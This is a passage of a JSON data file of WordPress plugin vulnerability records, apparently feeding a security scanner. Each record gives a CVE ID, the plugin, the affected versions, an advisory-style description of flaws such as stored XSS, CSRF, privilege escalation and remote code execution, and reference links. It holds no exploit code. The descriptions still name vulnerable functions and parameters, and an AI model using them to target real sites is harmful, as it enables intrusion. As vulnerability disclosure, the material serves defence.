replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddy-press-force-password-change\\\/trunk\\\/bp-force-password-change.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddy-press-force-password-change\\\/trunk\\\/bp-force-password-change.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3048c4c-77b1-4778-a5d0-b532df777d06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3048c4c-77b1-4778-a5d0-b532df777d06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5340","slug":"music-player-for-elementor","versionImpact":"2.4.6","description":"The Music Player for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018album_buy_url\u2019 parameter in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-player-for-elementor\\\/tags\\\/2.4.6\\\/classes\\\/widgets\\\/slide-music-player-free.php#L1205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-player-for-elementor\\\/tags\\\/2.4.6\\\/classes\\\/widgets\\\/slide-music-player-free.php#L1205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304812\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304812\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/music-player-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/music-player-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193d9625-34ab-497f-987e-5a53ca01e73e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193d9625-34ab-497f-987e-5a53ca01e73e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5944","slug":"bdthemes-element-pack-lite","versionImpact":"8.0.0","description":"The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-caption\u2019 attribute in all versions up to, and including, 8.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/feedback.bdthemes.com\\\/announcements?category=category_6l495r8q\",\"name\":\"https:\\\/\\\/feedback.bdthemes.com\\\/announcements?category=category_6l495r8q\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/uikit\\\/uikit\\\/issues\\\/5162\",\"name\":\"https:\\\/\\\/github.com\\\/uikit\\\/uikit\\\/issues\\\/5162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/image-accordion\\\/widgets\\\/image-accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/image-accordion\\\/widgets\\\/image-accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/lightbox\\\/widgets\\\/lightbox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/lightbox\\\/widgets\\\/lightbox.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319668\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319668\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6b1497-ffac-4eb3-baad-36270e419a95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6b1497-ffac-4eb3-baad-36270e419a95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4473","slug":"widget-shortcode","versionImpact":"0.3.5","description":"The Widget Shortcode WordPress plugin through 0.3.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5117b2e9-75b5-459a-b22a-b0e1b0744bd3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5117b2e9-75b5-459a-b22a-b0e1b0744bd3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1928","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the wpfc_preload_single_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to initiate cache creation.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56a90042-a6c0-4487-811b-ced23c97f9f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56a90042-a6c0-4487-811b-ced23c97f9f4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3411","slug":"image-map-pro-lite","versionImpact":"1.0.0","description":"The Image Map Pro \u2013 Drag-and-drop Builder for Interactive Images \u2013 Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.0. This is due to missing nonce validation on the ajax_store_save() function. This makes it possible for unauthenticated attackers to modify plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63e108f4-5d9d-4bcf-aef9-aa856f4241ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63e108f4-5d9d-4bcf-aef9-aa856f4241ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4293","slug":"wpdm-premium-packages","versionImpact":"5.7.4","description":"The Premium Packages - Sell Digital Products Securely plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.7.4 due to insufficient restriction on the 'wpdmpp_update_profile' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'profile[role]' parameter during a profile update.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.7.4\\\/wpdm-premium-packages.php#L1158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.7.4\\\/wpdm-premium-packages.php#L1158\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951917\\\/wpdm-premium-packages#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951917\\\/wpdm-premium-packages#file5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82137302-60ca-44d5-b087-dc96e2815fca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82137302-60ca-44d5-b087-dc96e2815fca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0512","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_wishlist function. This makes it possible for unauthenticated attackers to add items to user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2459","slug":"ux-flat","versionImpact":"4.1","description":"The UX Flat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ux-flat\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ux-flat\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5727","slug":"widget4call","versionImpact":"1.0.7","description":"The Widget4Call WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f677863-2f4f-474f-ba48-f490f9d6e71c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f677863-2f4f-474f-ba48-f490f9d6e71c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9518","slug":"userplus","versionImpact":"2.0","description":"The UserPlus plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.0 due to insufficient restriction on the 'form_actions' and 'userplus_update_user_profile' functions. This makes it possible for unauthenticated attackers to specify their user role by supplying the 'role' parameter during a registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2489e649-27f7-4ca0-8655-0957016fa89a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2489e649-27f7-4ca0-8655-0957016fa89a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/functions\\\/user-functions.php?rev=1604604#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/functions\\\/user-functions.php?rev=1604604#L47\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9686","slug":"order-notification-for-telegram","versionImpact":"1.0.1","description":"The Order Notification for Telegram plugin for WordPress is vulnerable to unauthorized test message sending due to a missing capability check on the 'nktgnfw_send_test_message' function in versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to send a test message via the Telegram Bot API to the user configured in the settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c182b4f2-c67b-4e82-a790-6d98946ebf2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c182b4f2-c67b-4e82-a790-6d98946ebf2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-notification-for-telegram\\\/tags\\\/1.0.1\\\/inc\\\/admin_ajax.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-notification-for-telegram\\\/tags\\\/1.0.1\\\/inc\\\/admin_ajax.php#L5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10527","slug":"spacer","versionImpact":"3.0.7","description":"The Spacer plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the motech_spacer_callback() function in all versions up to, and including, 3.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view limited setting information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spacer\\\/tags\\\/3.0.7\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spacer\\\/tags\\\/3.0.7\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112ece28-27ac-4d3c-b302-7acab43390fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112ece28-27ac-4d3c-b302-7acab43390fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11133","slug":"eventer","versionImpact":"3.9.9.4","description":"The Eventer plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'handle_pdf_download_request' function in all versions up to, and including, 3.9.9. This makes it possible for unauthenticated attackers to download event tickets.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d78b823-fdff-41b2-8059-6564e3eb668d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d78b823-fdff-41b2-8059-6564e3eb668d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1315","slug":"iwjob","versionImpact":"3.5.1","description":"The InWave Jobs plugin for WordPress is vulnerable to privilege escalation via password reset in all versions up to, and including, 3.5.1. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/injob-job-board-wordpress-theme\\\/20322987\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/injob-job-board-wordpress-theme\\\/20322987\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49c7b2a-5241-4762-b7c9-c33b1ac4a668?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49c7b2a-5241-4762-b7c9-c33b1ac4a668?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28928","slug":"are-you-robot-recaptcha","versionImpact":"2.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sureshdsk Are you robot google recaptcha for wordpress allows Reflected XSS. This issue affects Are you robot google recaptcha for wordpress: from n\/a through 2.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/are-you-robot-recaptcha\\\/vulnerability\\\/wordpress-are-you-robot-google-recaptcha-for-wordpress-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/are-you-robot-recaptcha\\\/vulnerability\\\/wordpress-are-you-robot-google-recaptcha-for-wordpress-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3776","slug":"verification-sms-targetsms","versionImpact":"1.5","description":"The Verification SMS with TargetSMS plugin for WordPress is vulnerable to limited Remote Code Execution in all versions up to, and including, 1.5 via the 'targetvr_ajax_handler' function. This is due to a lack of validation on the type of function that can be called. This makes it possible for unauthenticated attackers to execute any callable function on the site, such as phpinfo().","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed08d248-7467-4a3b-91a2-4286d91b9c50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed08d248-7467-4a3b-91a2-4286d91b9c50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4671","slug":"profile-builder","versionImpact":"3.13.8","description":"The Profile Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's user_meta and compare shortcodes in all versions up to, and including, 3.13.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/compare.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/compare.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/usermeta.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/usermeta.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304692\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304692\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profile-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profile-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346c9785-0069-40ec-a255-fe2dae30f7a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346c9785-0069-40ec-a255-fe2dae30f7a0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6740","slug":"contact-form-cfdb7","versionImpact":"1.3.1","description":"The Contact Form 7 Database Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tmpD\u2019 parameter in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-cfdb7\\\/tags\\\/1.3.1\\\/contact-form-cfdb-7.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-cfdb7\\\/tags\\\/1.3.1\\\/contact-form-cfdb-7.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320134\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320134\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-cfdb7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-form-cfdb7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/014803c8-3319-48ad-98c7-d1f372d37ff2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/014803c8-3319-48ad-98c7-d1f372d37ff2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4471","slug":"yet-another-related-posts-plugin","versionImpact":"5.30.1","description":"The YARPP WordPress plugin through 5.30.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cf792b-054c-4d77-bcae-3b700f42130b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c6cf792b-054c-4d77-bcae-3b700f42130b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1927","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the deleteCssAndJsCacheToolbar function. This makes it possible for unauthenticated attackers to perform cache deletion via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d3858f5-3f13-400c-acf4-eb3dc3a43308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d3858f5-3f13-400c-acf4-eb3dc3a43308?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3132","slug":"mainwp-child","versionImpact":"4.4.1.1","description":"The MainWP Child plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.4.1.1 due to insufficient controls on the storage of back-up files. This makes it possible for unauthenticated attackers to extract sensitive data including the entire installations database if a backup occurs and the deletion of the back-up files fail.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2923512%40mainwp-child&new=2923512%40mainwp-child&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2923512%40mainwp-child&new=2923512%40mainwp-child&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fadba1-674f-4f3d-997f-d29d3a887414?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1fadba1-674f-4f3d-997f-d29d3a887414?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5815","slug":"blog-designer-pack","versionImpact":"3.4.1","description":"The News & Blog Designer Pack \u2013 WordPress Blog Plugin \u2014 (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post Ticker, Blog Post Masonry) plugin for WordPress is vulnerable to Remote Code Execution via Local File Inclusion in all versions up to, and including, 3.4.1 via the bdp_get_more_post function hooked via a nopriv AJAX. This is due to function utilizing an unsafe extract() method to extract values from the POST variable and passing that input to the include() function. This makes it possible for unauthenticated attackers to include arbitrary PHP files and achieve remote code execution. On vulnerable Docker configurations it may be possible for an attacker to create a PHP file and then subsequently include it to achieve 